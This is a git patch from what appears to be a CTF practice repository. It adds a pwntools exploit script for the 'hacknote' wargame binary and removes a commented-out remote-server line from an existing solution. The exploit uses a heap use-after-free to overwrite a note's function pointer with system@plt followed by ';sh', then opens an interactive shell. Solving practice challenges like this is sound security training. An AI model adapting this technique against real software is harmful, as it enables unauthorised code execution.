From 1d1b1ffec2e356469a0be905d9765ccd6da09e67 Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Thu, 27 Jan 2022 15:53:37 +0800 Subject: [PATCH] Updated UAF/hacknote --- UAF/hacknote/answer.py | 1 - UAF/hacknote/shell.py | 50 ++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 50 insertions(+), 1 deletion(-) create mode 100644 UAF/hacknote/shell.py diff --git a/UAF/hacknote/answer.py b/UAF/hacknote/answer.py index 4fc248a..82cfe7d 100644 --- a/UAF/hacknote/answer.py +++ b/UAF/hacknote/answer.py @@ -25,7 +25,6 @@ def note_print(p, index): p.recvuntil('Index :') p.sendline(str(index)) -# p = remote("hackme.inndy.tw", 7719) p = process('./hacknote') elf = ELF('./hacknote') gdb_command = """ diff --git a/UAF/hacknote/shell.py b/UAF/hacknote/shell.py new file mode 100644 index 0000000..36d5f81 --- /dev/null +++ b/UAF/hacknote/shell.py @@ -0,0 +1,50 @@ +#!/usr/bin/env python2 +from pwn import * +from LibcSearcher import * +from struct import pack +import os, base64, math, time +context(arch = "i386", os = "linux", log_level = "debug") + +def note_add(p, size, content): + p.recvuntil('Your choice :') + p.sendline('1') + p.recvuntil('Note size :') + p.sendline(str(size)) + p.recvuntil('Content :') + p.send(content) + +def note_delete(p, index): + p.recvuntil('Your choice :') + p.sendline('2') + p.recvuntil('Index :') + p.sendline(str(index)) + +def note_print(p, index): + p.recvuntil('Your choice :') + p.sendline('3') + p.recvuntil('Index :') + p.sendline(str(index)) + +p = process('./hacknote') +elf = ELF('./hacknote') +gdb_command = """ + #b *0x80486ca + #b *0x8048893 + #b *0x80488a9 + #b *0x804875c + #b *0x804896C + """ + +system_addr = elf.plt['system'] + 0x6 +# gdb.attach(p, gdb_command) + + +note_add(p, 100, "/bin/sh\x00") +note_add(p, 100, "/bin/sh\x00") +note_delete(p, 0) +note_delete(p, 1) +note_add(p, 8, p32(system_addr) + ";sh\x00") +note_print(p, 0) + + +p.interactive() \ No newline at end of file